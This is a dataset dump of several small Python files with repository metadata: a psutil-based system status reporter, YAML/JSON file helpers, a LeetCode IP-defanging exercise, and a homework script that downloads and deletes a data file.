    # sensors_temperatures() only exists on some platforms.
    if not hasattr(psutil, "sensors_temperatures"):
        return None
    temps = psutil.sensors_temperatures()
    if not temps:
        return None
    # Fix: guard the "coretemp" lookup -- indexing directly raised
    # KeyError (or IndexError on an empty list) on machines without
    # that driver.
    cpu_temps = temps.get("coretemp")
    if not cpu_temps:
        return None
    return cpu_temps[0].current
def get_disk_status() -> Dict[str, str]:
    """Map each mountpoint with a supported filesystem to its disk-usage dict."""
    usage_by_mountpoint = dict()
    for part in psutil.disk_partitions():
        # Only keep filesystems we know how to report on.
        if part.fstype.lower() not in valid_fstypes:
            continue
        mountpoint = part._asdict()["mountpoint"]
        usage_by_mountpoint[mountpoint] = psutil.disk_usage("{}".format(mountpoint))._asdict()
    return usage_by_mountpoint
def get_pc_status() -> Union[Dict[str, str], Dict[str, dict], Dict[str, str]]:
    """Collect disk, memory and battery information via psutil.

    Returns a 3-tuple (disks, memory, battery), in this order.
    """
    disk_info = get_disk_status()
    memory_info = {
        "RAM": psutil.virtual_memory()._asdict(),
        "SWAP": psutil.swap_memory()._asdict(),
    }
    battery_info = get_battery_status()
    return disk_info, memory_info, battery_info
def get_battery_status() -> Dict[str, str]:
    """Return the battery reading as a dict, or None when unavailable.

    psutil.sensors_battery() returns None on machines without a battery
    (which previously made ._asdict() raise AttributeError) and may be
    unimplemented on some platforms; both cases now map explicitly to
    None instead of being swallowed by a bare ``except:`` that also
    caught KeyboardInterrupt/SystemExit.
    """
    try:
        battery = psutil.sensors_battery()
    except (AttributeError, NotImplementedError, OSError):
        return None
    return battery._asdict() if battery is not None else None
def get_graphical(bar_size, in_dict=False) -> Union[str, Dict[str, str]]:
    """Using the bar module, creates a visual representation of the system's status.

    Shows each disk's and the memory's usage (percentage bar, used and total
    space in GiB) plus the battery's remaining lifetime, whether it is
    plugged in, and its percentage.

    :param bar_size: width of the rendered bars, in characters
    :param in_dict: when True, return {section: [values..., bar]} instead of
        one formatted string
    """
    disks, memory, battery = get_pc_status()
    bars = bar.loading_bar("", 100, size=bar_size, show="▓", off_show="░")
    if battery is not None:
        bars.update(round(battery["percent"], 1), False)
        battery["bar"] = bars.bar()
    if in_dict:
        d = {}
    else:
        string = ""
    # One section per monitored disk: total, used and a percentage bar.
    for mp, disk in disks.items():
        bars.update(round(disk["percent"], 1), False)
        dbar = bars.bar()
        # Convert byte counts to GiB for display.
        tmp = round(int(disk["total"]) / (1024 ** 3), 2)
        total = f"{tmp} GiB"
        tmp = round(int(disk["used"]) / (1024 ** 3), 2)
        used = f"{tmp} GiB"
        if in_dict:
            d[f"{mp.upper()}"] = [total, used, dbar]
        else:
            string += f"{mp}: Max: {total}, used: {used}\n{dbar}\n"
    # RAM and swap sections.
    for key in ["RAM", "SWAP"]:
        tmp = round(int(memory[key]["used"]) / (1024 ** 3), 2)
        used = f"{tmp} GiB"
        tmp = round(int(memory[key]["total"]) / (1024 ** 3), 2)
        _max = f"{tmp} GiB"
        bars.update(round(memory[key]["percent"], 1), False)
        _bar = bars.bar()
        if in_dict:
            d[key] = [_max, used, _bar]
        else:
            # Fix: label each row with its own key -- the SWAP row was
            # previously mislabelled "Max RAM memory".
            string += f"Max {key} memory: {_max} / Used memory: {used}\n{_bar}\n"
    if battery is None:
        if in_dict:
            d['Battery'] = ["Not detected"]
        else:
            string += "Battery not detected!"
    else:
        # Empty string when plugged in, "not " otherwise.
        tmp = "" if battery["power_plugged"] else "not "
        if in_dict:
            d["Battery"] = [timedelta(seconds=battery['secsleft']), f"The power is {tmp}plugged in", battery['bar']]
        else:
            string += f"Remaining battery life: {timedelta(seconds=battery['secsleft'])} and it's {tmp}plugged in.\nBattery status:\n {battery['bar']}"
    if in_dict:
        return d
    else:
        return string
# Demo entry point: render the status report with 25-character bars.
if __name__ == "__main__" :
    print(get_graphical(25))
| 674 | 0 | 69 |
3b99b9dd6b06bd5c78b691884ff6d652212f2f36 | 659 | py | Python | wush/common/files.py | wxnacy/wush | 30620144f7a6fb676d210dd9463b77894f956b38 | [
"MIT"
] | null | null | null | wush/common/files.py | wxnacy/wush | 30620144f7a6fb676d210dd9463b77894f956b38 | [
"MIT"
] | null | null | null | wush/common/files.py | wxnacy/wush | 30620144f7a6fb676d210dd9463b77894f956b38 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author: wxnacy@gmail.com
"""
"""
import os
import json
import yaml
| 20.59375 | 47 | 0.544765 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author: wxnacy@gmail.com
"""
"""
import os
import json
import yaml
class FileUtils:
    """Helpers for loading and saving dict data from YAML/JSON files."""

    @classmethod
    def read_dict(cls, filepath):
        """Read dict data from *filepath*.

        Files ending in ``.yml``/``.yaml`` are parsed as YAML; anything
        else is parsed as JSON.

        :param str filepath: path to the file (``~`` is expanded, for
            consistency with :meth:`save_yml`)
        """
        # Expand "~" the same way save_yml does (the two methods
        # previously disagreed about this).
        filepath = os.path.expanduser(filepath)
        with open(filepath, 'r') as f:
            # Also accept the common ".yaml" spelling.
            if filepath.endswith(('.yml', '.yaml')):
                return yaml.safe_load(f)
            # json.load streams the file directly instead of joining
            # readlines() output by hand.
            return json.load(f)

    @classmethod
    def save_yml(cls, filepath, data):
        """Save *data* to *filepath* in YAML format (``~`` is expanded)."""
        filepath = os.path.expanduser(filepath)
        with open(filepath, 'w') as f:
            yaml.dump(data, f)
| 0 | 554 | 23 |
4606bcc51ea2eb49e447b7dd4c5dcabff35dcc25 | 225 | py | Python | Practice/PythonApplication/LeetCode/Facebook/1108.py | kushalbhola/MyStuff | 3f1064866487e489af41f8662a875b9954d5d8b0 | [
"Apache-2.0"
] | null | null | null | Practice/PythonApplication/LeetCode/Facebook/1108.py | kushalbhola/MyStuff | 3f1064866487e489af41f8662a875b9954d5d8b0 | [
"Apache-2.0"
] | 1 | 2020-04-29T23:00:26.000Z | 2020-04-29T23:00:26.000Z | Practice/PythonApplication/LeetCode/Facebook/1108.py | kushalbhola/MyStuff | 3f1064866487e489af41f8662a875b9954d5d8b0 | [
"Apache-2.0"
] | null | null | null |
import sys
# Script entry point; main() is defined elsewhere in the full file.
if __name__ == '__main__':
    main()
| 9.782609 | 37 | 0.573333 |
import sys
def main():
    """Demo: defang a sample IPv4 address and print the result."""
    sample = "1.1.1.1"
    print(defangIPaddr(sample))
def defangIPaddr(input):
    """Return *input* with every '.' replaced by '[.]' (LeetCode 1108)."""
    return input.replace('.', '[.]')
# Run the demo when executed directly.
if __name__ == '__main__':
    main()
| 120 | 0 | 44 |
56ffea9c0aa97af0ce4ad0bdbe4ca4c90c3ff9f1 | 44 | py | Python | dddpy/bases/__init__.py | aeroworks-io/python-ddd | 4d9c5de05f33aa63f8b6ca1c6a0cb33238208bee | [
"Apache-2.0"
] | 1 | 2021-10-17T09:23:59.000Z | 2021-10-17T09:23:59.000Z | dddpy/bases/__init__.py | aeroworks-io/python-ddd | 4d9c5de05f33aa63f8b6ca1c6a0cb33238208bee | [
"Apache-2.0"
] | null | null | null | dddpy/bases/__init__.py | aeroworks-io/python-ddd | 4d9c5de05f33aa63f8b6ca1c6a0cb33238208bee | [
"Apache-2.0"
] | null | null | null | from .domain import *
from .common import *
| 14.666667 | 21 | 0.727273 | from .domain import *
from .common import *
| 0 | 0 | 0 |
b6020f9f3d1ebec20e80cdb91c19f83673740879 | 857 | py | Python | Hw4_get_del_data.py | UWSEDS/hw4-exceptions-and-unit-tests-jahnavijasti | 66720cfe29e7f71169e23e5a7ef5f2698581b9ee | [
"MIT"
] | null | null | null | Hw4_get_del_data.py | UWSEDS/hw4-exceptions-and-unit-tests-jahnavijasti | 66720cfe29e7f71169e23e5a7ef5f2698581b9ee | [
"MIT"
] | null | null | null | Hw4_get_del_data.py | UWSEDS/hw4-exceptions-and-unit-tests-jahnavijasti | 66720cfe29e7f71169e23e5a7ef5f2698581b9ee | [
"MIT"
] | null | null | null | import os
import urllib
| 25.969697 | 87 | 0.589265 | import os
import urllib
def get_data(url):
    """Download *url* into the current directory, named by its basename.

    :param url: URL of the file to fetch
    :return: 'downloading' on a fresh download, 'file exists' when the
        file is already present locally, the HTTP status code on an
        HTTP error, or the failure reason on any other URL error.
    """
    # `import urllib` alone does not load these submodules; import them
    # explicitly so urllib.request/urllib.error are guaranteed to exist.
    import urllib.request
    import urllib.error
    try:
        filename = os.path.basename(url)
        if not os.path.exists(filename):
            request = urllib.request.Request(url)
            with urllib.request.urlopen(request) as response:
                csv = response.read()
            # Fix: write next to where the existence check looks (the
            # current directory) instead of a hard-coded user path, so
            # the check, the write and del_data() all agree.
            with open(filename, 'wb') as file:
                file.write(csv)
            return('downloading')
        else:
            return('file exists')
    except urllib.error.HTTPError as error:
        return(error.code)
    # HTTPError is a subclass of URLError, so this handler must come second.
    except urllib.error.URLError as error:
        # Fix: URLError has no .code attribute (that raised AttributeError
        # here); .reason describes the failure.
        return(error.reason)
def del_data(url):
    """Delete the local file named after *url*'s basename, if present.

    :return: 'deleted file' when a file was removed, otherwise
        'no file to delete'.
    """
    target = os.path.basename(url)
    if not os.path.isfile(target):
        return('no file to delete')
    os.remove(target)
    return('deleted file')